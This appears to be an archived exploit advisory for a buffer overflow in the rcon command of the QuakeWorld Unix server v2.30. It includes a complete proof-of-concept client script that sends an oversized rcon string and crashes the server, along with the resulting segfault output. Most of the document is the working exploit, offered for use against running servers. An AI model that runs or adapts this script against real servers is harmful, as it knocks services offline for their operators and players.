Quake World server for Unix v2.30 contains a buffer overflow in the rcon featurE which causes the server to crash with a segmentation fault. Proof of concept exploit included.
5b198903dd85e21a8769b846a484a623ccc88784bcd3bfc27ed0eaca05c05520
tested on qwsv-2.30-glibc-i386-unknown-linux2.0
The Quakeworld server (unix) rcon feature contains a buffer overflow which
crashes the server, segfaults and core dumps. There are a bunch of
different quakeworld servers out, picking a different one would
probably be a good idea.
RCONEX by kilrid@berZerker.net
Killing current QuakeWorld Server....
this will most likely crash your QuakeWorld client..
Segmentation fault
---
The server sees:
kilrid entered the game
Segmentation fault (core dumped)
*RCONEX script
--snip--
//QuakeWorld RCON exploit by kilrid@berZerker.net
echo RCONEX by kilrid@berZerker.net
echo Killing current QuakeWorld Server....
echo this will most likely crash your QuakeWorld client..
wait 5
rcon 10X0110X0110X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X010X0
--snip--
-kilrid@berZerker.net
www.Hack-X.org